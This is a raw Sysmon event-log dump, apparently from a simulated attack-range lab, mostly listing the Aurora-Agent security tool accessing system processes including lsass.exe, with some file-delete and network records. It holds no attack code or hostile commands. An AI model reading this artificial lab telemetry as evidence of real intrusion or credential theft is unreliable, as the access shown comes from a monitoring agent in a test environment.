Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015897Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.766{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015896Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.763{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015895Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.762{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015894Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.754{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015893Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.748{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015892Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.747{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015891Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.725{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015890Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.719{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015889Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.705{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015888Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.702{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015887Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.673{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015886Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.658{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015885Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.650{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015884Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.642{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015883Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.633{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015882Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.590{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015881Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.583{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015880Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.578{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015879Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.566{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015878Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.556{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015877Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.549{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015876Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.538{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015875Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.535{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 23542300x800000000000000015874Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.162{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F8B54E4139081C988B1E74092B0EF6A,SHA256=C596D880CE6C59FE8FCADECAA5F48B8F5BC6AA216C2AE5E399D6F607B904C951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:42.911{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:42.911{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:42.911{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000041137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:42.244{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30F4D62C9B66A976E06F02B983E0E77A,SHA256=FFF07FD2364AC82A83C6419E41EF048E5CA70EF5A74E94FAD6E3E31236796F77,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015906Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:43.594{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F758BF99B5E4E53FC57CA9BB66D17897,SHA256=191D77B08F9E97FAD6578575A7D2BB4BAA2C0294BBDAA3E68D244EAB7EF18404,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:40.554{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56268-false10.0.1.12-8000- 23542300x800000000000000041142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:43.331{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B413AA026C62517863FFA959EBAE2F4E,SHA256=9FF01CCF3ADD372DD8725C43C7D6B067CA972CAFE6C46DA79C848D66E80F027B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:43.108{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-040MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015907Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:44.646{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 